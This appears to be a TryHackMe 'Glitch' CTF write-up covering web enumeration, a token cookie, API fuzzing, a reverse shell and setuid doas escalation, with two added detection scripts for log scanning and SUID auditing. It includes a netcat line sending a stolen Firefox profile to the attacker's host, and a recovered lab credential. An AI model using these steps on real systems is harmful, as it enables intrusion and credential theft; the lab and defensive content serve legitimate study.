GeorgeBanu

GLITCH

Challenge showcasing a web app and simple privilege escalation. Can you find the glitch?


Last updated 1 year ago

Lab Setup

mkdir ~/Documents/tryhackme/glitch
cd ~/Documents/tryhackme/glitch
mkdir recon enumeration notes
touch notes/{README.md,vuln,creds}

export IP=10.10.29.23

Enumeration

First, scan the machine for open ports using RustScan. It is faster than Nmap, so I prefer to use it exclusively for now.

rustscan -a $IP --ulimit 5000 -- -sC -sV -v -A -T4 -oN recon/rustscan.init

Looks like only the HTTP port is open. Let's open it in the browser and see what's there. Nothing interesting, so I run feroxbuster to fuzz for files and directories. I also run nikto in the background, because it takes a while.

nikto --host http://$IP -C all -o enumeration/nikto.txt
feroxbuster -u http://$IP -w /usr/share/seclists/Discovery/Web-Content/common.txt -o enumeration/feroxbuster

I discovered an interesting path: /api/acces. When I access it, I find a token whose value is base64 encoded.

echo 'dGhpc19pc19ub3RfcmVhbA=='| base64 -d 

Replace the token with the decoded value and fuzz once more with the cookie configured accordingly.

feroxbuster -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://$IP -b 'token=this_is_not_real'

After another round of fuzzing for files and directories, I examine the JavaScript code located at /js/script.js.

This reveals another interesting path, /api/items. After a while I get something back in the response by changing the request method.

At this stage I was stuck for a while. I then fuzzed for parameters, looking for responses with a 500 status code.
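The fuzzing rounds above (feroxbuster with a wordlist, then parameter fuzzing) leave a very recognisable footprint on the server side: one client producing a burst of 404 responses in a short time. The following script is an added example, not part of the original writeup, that pulls that signal out of a common-log-format access log. The log lines are constructed for illustration and the threshold of four 404s is an arbitrary assumption; tune it to the site's normal error rate.

```shell
#!/bin/sh
# Added example (not from the original writeup): flag clients that generate a
# burst of 404 responses in a web server access log, the footprint that a
# wordlist scan such as the feroxbuster run above leaves behind.
# The log lines below are constructed for illustration; only the client-IP
# ($1) and status ($9) columns of the common log format are used.

LOG="${TMPDIR:-/tmp}/access_sample.log"
cat > "$LOG" <<'EOF'
10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /api/acces HTTP/1.1" 200 512
10.0.0.5 - - [10/Oct/2023:13:55:37 +0000] "GET /admin HTTP/1.1" 404 153
10.0.0.5 - - [10/Oct/2023:13:55:37 +0000] "GET /backup HTTP/1.1" 404 153
10.0.0.5 - - [10/Oct/2023:13:55:38 +0000] "GET /cgi-bin HTTP/1.1" 404 153
10.0.0.5 - - [10/Oct/2023:13:55:38 +0000] "GET /config HTTP/1.1" 404 153
10.0.0.5 - - [10/Oct/2023:13:55:39 +0000] "GET /js/script.js HTTP/1.1" 200 2048
10.0.0.9 - - [10/Oct/2023:13:56:01 +0000] "GET / HTTP/1.1" 200 1024
10.0.0.9 - - [10/Oct/2023:13:56:05 +0000] "GET /favicon.ico HTTP/1.1" 404 153
EOF

# Print "ip count" for every client whose number of 404 responses reaches
# the threshold given as the second argument (default 4, an assumed value).
flag_scanners() {
    log="$1"
    threshold="${2:-4}"
    awk -v t="$threshold" '$9 == 404 { c[$1]++ }
        END { for (ip in c) if (c[ip] >= t) print ip, c[ip] }' "$log" | sort
}

# Only 10.0.0.5 crosses the default threshold; 10.0.0.9 has a single,
# ordinary missing-favicon 404 and stays quiet.
flag_scanners "$LOG"
```

Run it against the real access log instead of the constructed sample (`flag_scanners /var/log/apache2/access.log 50`) and feed the output to whatever alerting you have; a client that trips this while also receiving 200s for paths no link on the site points to (/api/acces above) is exactly the pattern this room's enumeration produces.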

Now all I need to do is to get a reverse shell.

We get a shell as the user, and in the home directory we find the user.txt flag. In the same directory I found a .firefox directory, and again I was stuck for a while.

Privilege Escalation

Transfer the directory to my machine and analyze it. Start the listener on my machine first, then send the archive from the target.

nc -lnvp 4747 | tar xvfz -          # on my machine
tar czf - .firefox | nc $my_IP 4747  # on the target

mv .firefox firefox

This took me a long time, but I finally got the answer by opening Firefox with the transferred profile and searching the saved passwords.

v0id:love_the_void

For privilege escalation I follow the usual enumeration steps. After some time I discovered that the doas binary has the SUID bit set. Switch to the user v0id and run doas.

find / -type f -perm -u=s 2>/dev/null
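From the defender's side, the find command above is only half of a check: the useful question is not "which files are SUID" but "which SUID files were not there before". The script below is an added example, not part of the original writeup, that diffs a current SUID inventory against a known-good baseline with `comm`, so a newly setuid binary such as doas stands out immediately. Both lists are constructed for illustration; on a real host the baseline is taken right after provisioning and the current list comes from the same find predicate the writeup uses.

```shell
#!/bin/sh
# Added example (not from the original writeup): report SUID binaries that
# are present on a host but absent from a known-good baseline.
# Both lists below are constructed for illustration.
export LC_ALL=C   # stable collation so sort and comm agree

WORK="${TMPDIR:-/tmp}/suid_audit"
mkdir -p "$WORK"

# Baseline: the setuid files a freshly provisioned host is expected to have.
cat > "$WORK/baseline.txt" <<'EOF'
/usr/bin/passwd
/usr/bin/su
/usr/bin/sudo
/usr/bin/mount
EOF

# Current inventory, as produced by the writeup's find command on a host
# where doas has since been installed setuid.
cat > "$WORK/current.txt" <<'EOF'
/usr/bin/passwd
/usr/bin/su
/usr/bin/sudo
/usr/bin/mount
/usr/bin/doas
EOF

# Print every path in the current list that is missing from the baseline.
# comm requires sorted input, so both lists are sorted (and de-duplicated)
# first; -13 suppresses lines unique to the baseline and lines common to both.
suid_diff() {
    sort -u "$1" > "$WORK/baseline.sorted"
    sort -u "$2" > "$WORK/current.sorted"
    comm -13 "$WORK/baseline.sorted" "$WORK/current.sorted"
}

# On a live host, generate the current list with the same predicate as above:
#   find / -type f -perm -u=s 2>/dev/null | sort > current.txt
suid_diff "$WORK/baseline.txt" "$WORK/current.txt"
```

Anything the diff prints deserves a decision: either the binary is legitimately setuid and gets added to the baseline, or it is removed (`chmod u-s`) and the change that introduced it is investigated. Running this from cron and alerting on non-empty output turns the one-off enumeration step into a standing control.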